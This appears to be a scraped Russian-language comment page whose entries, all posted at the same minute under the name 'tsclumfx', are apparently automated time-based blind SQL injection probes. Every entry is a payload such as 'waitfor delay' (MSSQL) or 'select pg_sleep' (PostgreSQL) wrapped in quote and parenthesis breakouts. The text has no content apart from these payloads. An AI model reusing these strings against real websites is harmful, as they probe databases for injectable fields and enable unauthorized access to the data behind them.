Добавлено: 28-07-2016 04:17

-1; waitfor delay '0:0:18' --
tsclumfx
Добавлено: 28-07-2016 04:17

-1); waitfor delay '0:0:6' --
tsclumfx
Добавлено: 28-07-2016 04:17

-1)); waitfor delay '0:0:12' --
tsclumfx
Добавлено: 28-07-2016 04:17

1 waitfor delay '0:0:12' --
tsclumfx
Добавлено: 28-07-2016 04:17

g25g8gXl'; waitfor delay '0:0:18' --
tsclumfx
Добавлено: 28-07-2016 04:17

Nuef6v48'); waitfor delay '0:0:6' --
tsclumfx
Добавлено: 28-07-2016 04:17

xPHMBQBE')); waitfor delay '0:0:6' --
tsclumfx
Добавлено: 28-07-2016 04:17

-1;select pg_sleep(18); --
tsclumfx
Добавлено: 28-07-2016 04:17

-1);select pg_sleep(18); --
tsclumfx
Добавлено: 28-07-2016 04:17

-1));select pg_sleep(6); --
tsclumfx
Добавлено: 28-07-2016 04:17

ycwJvgih';select pg_sleep(12); --
tsclumfx
Добавлено: 28-07-2016 04:17

iiyX2Hph');select pg_sleep(12); --
tsclumfx
Добавлено: 28-07-2016 04:17

b5TiDCsu'));select pg_sleep(18); --